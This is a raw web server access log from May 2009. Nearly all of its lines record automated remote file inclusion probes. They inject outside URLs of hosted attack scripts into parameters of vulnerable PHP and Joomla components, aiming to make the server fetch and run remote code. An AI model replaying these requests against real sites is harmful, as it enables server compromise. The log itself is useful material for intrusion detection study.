89.166.50.90 - - [12/May/2009:01:44:43 -0400] "GET /logs//secpay.inc.php?config[root_dir]=http://www.search9.net/config/proxy/cmd.do?? HTTP/1.1" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
217.160.4.250 - - [12/May/2009:01:44:56 -0400] "GET /logs/access_log.Q108102500%20/?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
217.160.4.250 - - [12/May/2009:01:44:58 -0400] "GET /logs/access_log.Q108102500%20/?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
63.223.85.28 - - [12/May/2009:01:44:58 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
63.223.85.28 - - [12/May/2009:01:44:58 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
63.223.85.28 - - [12/May/2009:01:44:58 -0400] "GET /logs/access_log.Q109050700/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
217.160.4.250 - - [12/May/2009:01:44:58 -0400] "GET /logs/access_log.Q108102500%20/?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:45:03 -0400] "GET /logs/error_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
63.223.85.28 - - [12/May/2009:01:45:08 -0400] "GET /logs/access_log.Q109042600/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
217.18.76.16 - - [12/May/2009:01:45:11 -0400] "GET /logs/access_log.Q108111500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
217.160.4.250 - - [12/May/2009:01:45:25 -0400] "GET /logs/access_log.Q108102500%20/?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:45:26 -0400] "GET /logs/error_log.Q108111500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
202.89.33.167 - - [12/May/2009:01:45:28 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:01:45:28 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:01:45:28 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:01:45:28 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:01:45:28 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:01:45:28 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.172.126.16 - - [12/May/2009:01:45:29 -0400] "GET /logs/access_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
217.18.76.16 - - [12/May/2009:01:45:34 -0400] "GET /logs/access_log.Q108102500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:45:34 -0400] "GET /logs/error_log.Q108102500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:45:38 -0400] "GET /logs/error_log.Q108082200/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:45:39 -0400] "GET /logs/error_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:45:40 -0400] "GET /logs/error_log.Q108071800/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:45:43 -0400] "GET /logs/access_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.89.33.167 - - [12/May/2009:01:45:55 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:01:45:55 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:01:45:55 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
89.166.50.90 - - [12/May/2009:01:46:00 -0400] "GET //secpay.inc.php?config[root_dir]=http://www.search9.net/config/proxy/cmd.do?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
89.166.50.90 - - [12/May/2009:01:46:00 -0400] "GET /logs//secpay.inc.php?config[root_dir]=http://www.search9.net/config/proxy/cmd.do?? HTTP/1.1" 404 218 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
88.191.103.144 - - [12/May/2009:01:46:01 -0400] "GET /logs/error_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
110.45.144.107 - - [12/May/2009:01:46:04 -0400] "GET /logs/access_log.Q108122500//phplive/setup/header.php?css_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
63.223.85.28 - - [12/May/2009:01:46:37 -0400] "GET /logs/access_log.Q109050700%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
63.223.85.28 - - [12/May/2009:01:46:42 -0400] "GET /logs/access_log.Q109042600%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
69.172.126.16 - - [12/May/2009:01:46:43 -0400] "GET /logs/error_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
64.12.116.138 - - [12/May/2009:01:46:48 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Ant.com Toolbar 1.1; FBSMTWB; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; InfoPath.2)"
202.89.33.167 - - [12/May/2009:01:46:52 -0400] "GET /logs/access_log.Q109050300%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
88.191.103.144 - - [12/May/2009:01:46:56 -0400] "GET /logs/access_log.Q108111500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.825"
88.84.128.40 - - [12/May/2009:01:46:57 -0400] "GET /logs/error_log.Q108101400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
202.89.33.167 - - [12/May/2009:01:47:01 -0400] "GET /logs/access_log.Q109050300%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
88.84.128.40 - - [12/May/2009:01:47:01 -0400] "GET /logs/access_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
202.89.33.167 - - [12/May/2009:01:47:02 -0400] "GET /logs/access_log.Q109050300%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
147.27.14.31 - - [12/May/2009:01:47:10 -0400] "GET /logs/error_log.Q108101400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
147.27.14.31 - - [12/May/2009:01:47:14 -0400] "GET /logs/access_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
209.59.12.99 - - [12/May/2009:01:47:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.172.126.16 - - [12/May/2009:01:47:34 -0400] "GET /logs/access_log.Q108111500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
147.27.14.31 - - [12/May/2009:01:48:33 -0400] "GET /logs/access_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
88.191.103.144 - - [12/May/2009:01:48:36 -0400] "GET /logs/error_log.Q108111500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
69.172.126.16 - - [12/May/2009:01:48:53 -0400] "GET /logs/error_log.Q108111500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
88.84.128.40 - - [12/May/2009:01:48:56 -0400] "GET /logs/access_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
88.191.103.144 - - [12/May/2009:01:49:02 -0400] "GET /logs/access_log.Q108102500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.825"
69.172.126.16 - - [12/May/2009:01:49:14 -0400] "GET /logs/access_log.Q108102500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
88.191.103.144 - - [12/May/2009:01:49:20 -0400] "GET /logs/error_log.Q108102500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
202.89.33.167 - - [12/May/2009:01:49:24 -0400] "GET /logs/access_log.Q109042600%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.172.126.16 - - [12/May/2009:01:49:26 -0400] "GET /logs/error_log.Q108102500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
202.89.33.167 - - [12/May/2009:01:49:32 -0400] "GET /logs/access_log.Q109042600%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:01:49:43 -0400] "GET /logs/access_log.Q109042600%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.172.126.16 - - [12/May/2009:01:49:59 -0400] "GET /logs/error_log.Q108082200/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
88.191.103.144 - - [12/May/2009:01:49:59 -0400] "GET /logs/error_log.Q108082200/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
69.172.126.16 - - [12/May/2009:01:49:59 -0400] "GET /logs/error_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
88.191.103.144 - - [12/May/2009:01:50:00 -0400] "GET /logs/error_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:01:50:05 -0400] "GET /logs/error_log.Q108071800/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:01:50:07 -0400] "GET /logs/access_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.825"
69.172.126.16 - - [12/May/2009:01:50:09 -0400] "GET /logs/error_log.Q108071800/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:01:50:12 -0400] "GET /logs/access_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
147.27.14.31 - - [12/May/2009:01:50:15 -0400] "GET /logs/error_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
88.84.128.40 - - [12/May/2009:01:50:35 -0400] "GET /logs/error_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
147.27.14.31 - - [12/May/2009:01:51:37 -0400] "GET /logs/access_log.Q108111500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
88.84.128.40 - - [12/May/2009:01:52:17 -0400] "GET /logs/access_log.Q108111500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
209.59.12.99 - - [12/May/2009:01:52:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.160.4.250 - - [12/May/2009:01:52:31 -0400] "GET /logs/access_log.Q108090200/?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.160.4.250 - - [12/May/2009:01:52:41 -0400] "GET /logs/access_log.Q108100600%20%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
217.199.222.19 - - [12/May/2009:01:53:06 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.199.222.19 - - [12/May/2009:01:53:06 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
217.199.222.19 - - [12/May/2009:01:53:06 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
147.27.14.31 - - [12/May/2009:01:53:36 -0400] "GET /logs/error_log.Q108111500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
66.249.72.114 - - [12/May/2009:01:53:51 -0400] "GET /images/items/Index6_warmupjackets_over.jpg HTTP/1.1" 200 3922 "-" "Googlebot-Image/1.0"
217.115.136.12 - - [12/May/2009:01:53:53 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.115.136.12 - - [12/May/2009:01:53:53 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.115.136.12 - - [12/May/2009:01:53:54 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
221.139.1.251 - - [12/May/2009:01:53:59 -0400] "GET //index.php?str=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
221.139.1.251 - - [12/May/2009:01:53:59 -0400] "GET /logs//index.php?str=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.199.222.19 - - [12/May/2009:01:54:01 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.199.222.19 - - [12/May/2009:01:54:01 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
217.199.222.19 - - [12/May/2009:01:54:01 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
147.27.14.31 - - [12/May/2009:01:54:07 -0400] "GET /logs/access_log.Q108102500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
77.221.130.6 - - [12/May/2009:01:54:11 -0400] "GET //index.php?str=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.221.130.6 - - [12/May/2009:01:54:11 -0400] "GET /logs//index.php?str=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.221.130.6 - - [12/May/2009:01:54:11 -0400] "GET /logs/access_log.Q109010100//index.php?str=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
88.191.103.144 - - [12/May/2009:01:54:19 -0400] "GET /logs//index.php?str=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
88.191.103.144 - - [12/May/2009:01:54:19 -0400] "GET /logs/access_log.Q109010100//index.php?str=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
88.191.103.144 - - [12/May/2009:01:54:19 -0400] "GET //index.php?str=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.72.235 - - [12/May/2009:01:54:24 -0400] "GET /logs//index.php?str=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.72.235 - - [12/May/2009:01:54:24 -0400] "GET //index.php?str=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.72.235 - - [12/May/2009:01:54:24 -0400] "GET /logs/access_log.Q109010100//index.php?str=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
221.139.1.251 - - [12/May/2009:01:54:31 -0400] "GET /logs/access_log.Q109010100//index.php?str=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
147.27.14.31 - - [12/May/2009:01:54:36 -0400] "GET /logs/error_log.Q108102500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
88.191.103.144 - - [12/May/2009:01:54:59 -0400] "GET /logs/access_log.Q109010100%20%20//index.php?str=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
221.139.1.251 - - [12/May/2009:01:55:04 -0400] "GET /logs/access_log.Q109010100%20%20//index.php?str=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.191.103.144 - - [12/May/2009:01:55:11 -0400] "GET /logs/access_log.Q108123000%20%20//index.php?str=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.191.103.144 - - [12/May/2009:01:55:11 -0400] "GET /logs/access_log.Q109010700%20%20//index.php?str=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
147.27.14.31 - - [12/May/2009:01:55:13 -0400] "GET /logs/error_log.Q108082200/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
147.27.14.31 - - [12/May/2009:01:55:13 -0400] "GET /logs/error_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
147.27.14.31 - - [12/May/2009:01:55:22 -0400] "GET /logs/error_log.Q108071800/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
147.27.14.31 - - [12/May/2009:01:55:26 -0400] "GET /logs/access_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
221.139.1.251 - - [12/May/2009:01:55:31 -0400] "GET /logs/access_log.Q108123000%20%20//index.php?str=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
221.139.1.251 - - [12/May/2009:01:55:31 -0400] "GET /logs/access_log.Q109010700%20%20//index.php?str=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.191.103.144 - - [12/May/2009:01:55:35 -0400] "GET /logs/access_log.Q109041500%20%20//index.php?str=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.84.128.40 - - [12/May/2009:01:55:48 -0400] "GET /logs/error_log.Q108111500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
110.45.144.106 - - [12/May/2009:01:55:57 -0400] "GET /port.php?content=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:01:55:57 -0400] "GET /logs/access_log.Q109022200%20%20/port.php?content=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:01:55:57 -0400] "GET /logs/port.php?content=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:01:55:57 -0400] "GET /logs/access_log.Q108090900%20%20/port.php?content=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
88.191.103.144 - - [12/May/2009:01:56:02 -0400] "GET /logs/access_log.Q109030400%20%20//index.php?str=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
221.139.1.251 - - [12/May/2009:01:56:36 -0400] "GET /logs/access_log.Q109041500%20%20//index.php?str=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.84.128.40 - - [12/May/2009:01:56:57 -0400] "GET /logs/access_log.Q108102500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
209.59.12.99 - - [12/May/2009:01:57:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.144.106 - - [12/May/2009:01:57:36 -0400] "GET /logs/access_log.Q109022200/port.php?content=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:01:57:36 -0400] "GET /logs/access_log.Q108090900/port.php?content=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:01:57:45 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
